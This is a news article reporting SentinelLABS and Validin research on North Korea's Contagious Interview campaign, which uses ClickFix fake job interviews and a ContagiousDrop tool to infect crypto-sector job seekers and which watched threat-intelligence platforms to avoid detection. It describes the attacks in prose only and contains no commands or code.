Lazarus Group Deploys Malware With ClickFix Scam in Fake Job Interviews

North Korea’s Lazarus Group uses the ClickFix scam in fake crypto job interviews to deploy malware, steal data, and fund the regime’s programs.

A recent investigation by SentinelLABS and internet intelligence platform Validin reveals that North Korean threat actors behind the Contagious Interview campaign are actively abusing public cybersecurity platforms like Validin, Maltrail, and VirusTotal to improve their malicious activities.

The Contagious Interview campaign, active since at least 2023, targets job seekers in the cryptocurrency and blockchain industries. The goal is to steal money, which helps North Korea’s sanctioned economy and funds its missile programs. It is widely assessed to be a component of the larger Lazarus Group, a state-sponsored entity focused on generating revenue for North Korea.

The research, shared with Hackread.com, reveals that hackers use these platforms, which are designed to help cybersecurity professionals track threats, to monitor their own domains and avoid detection. Significant operational security (OPSEC) failures exposed files and directory contents, allowing researchers to piece together their timeline and methods.

The investigation covered the period from March to June 2025 and shows a worrying trend that the North Korean hackers operate in highly coordinated teams, likely using communication tools like Slack.

When Validin published an article about the group’s infrastructure on March 11, 2025, the hackers responded within hours, creating accounts to search for information about their own activities.

Even after Validin blocked their initial accounts, the hackers persisted, creating new ones from different email addresses and fake personas. Some of these personas were references to pop culture, like “Rock Lee” and “Mar Vel,” while others impersonated legitimate companies. Reportedly, between January and March 2025, the campaign impacted at least 230 individuals, though the actual number is likely much higher.

Countries targeted in this campaign (Credit: SentinelLABS)

It is worth noting that the hackers trick job seekers through a social engineering technique called ClickFix. This involves luring victims to a fake interview website where they are presented with a fabricated error, such as a camera issue. They are then instructed to copy and paste command lines to fix the problem, unknowingly deploying malware.

Attacks are carried out using a special tool, named ContagiousDrop, which is designed to deliver malware disguised as software updates. It’s smart enough to identify if a victim is using Windows, macOS, or Linux and then sends the correct type of malware.

Researchers observed that these applications also have a built-in email notification system that alerts the hackers whenever a victim engages with a fake job assessment or downloads the malicious file.

Email notification recipients (Credit: SentinelLABS)

They also suspect that the hackers are building a victim database, as the attackers’ server logs contained detailed information about the affected individuals, including their full names, email addresses, phone numbers, and IP addresses.

These victims were mainly in marketing and finance roles within the cryptocurrency sector and were targeted with fake job offers from well-known companies like Archblock, Robinhood, and eToro.

The report concludes that the most critical element in stopping this threat is the human factor, urging job seekers to “exercise heightened vigilance when engaging with employment offers and associated assessments.”